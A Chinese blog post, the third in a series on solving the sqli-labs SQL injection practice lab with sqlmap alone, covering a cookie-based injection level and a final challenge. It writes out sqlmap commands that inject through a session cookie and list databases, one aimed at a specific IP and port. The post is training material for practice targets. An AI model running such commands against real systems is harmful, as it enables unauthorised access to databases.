对于sqli-labs基础篇全程使用sqlmap不用手工注入 (3)

日期:2021-06-09 栏目:程序人生 浏览:

 

对于sqli-labs基础篇全程使用sqlmap不用手工注入

对于sqli-labs基础篇全程使用sqlmap不用手工注入

 

 

至于里面的一些内容上面已经有一些介绍了

下面是后一题就是第二十题了:报错型,单引号,cookie型注入

对于最后一题,我就用一个最近一个看到的一题结束吧

题目链接::16080/

 

 

对于sqli-labs基础篇全程使用sqlmap不用手工注入

直接进行抓包看一下:

 

对于sqli-labs基础篇全程使用sqlmap不用手工注入

 

Cookie有问题,直接使用sqlmap进行注入‘

python sqlmap.py -u "http://202.112.51.184:16080/" --cookie="PHPSESSID=cbc3a5ec86e968fa6ee74f1839c2097e" –dbs

 

 

对于sqli-labs基础篇全程使用sqlmap不用手工注入

对于sqli-labs基础篇全程使用sqlmap不用手工注入

对于sqli-labs基础篇全程使用sqlmap不用手工注入

 

--cookie

web应用基于cookie的身份验证,对于post请求,可以指定cookie

sqlmap -u "url" --cookie="..." --level 3 –dbs

 

 

参考文章:

sqli-labs Less(1-35) 小结:https://www.cnblogs.com/peterpan0707007/p/7620048.html

sqlmap注入总结:

SQLI-LAB  的 实战记录(Less 11 - Less 20):https://blog.csdn.net/qq_21500173/article/details/51920968

上一篇:分享几个技术视频的网站!
下一篇:没有了

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wpsxpy.html

相关推荐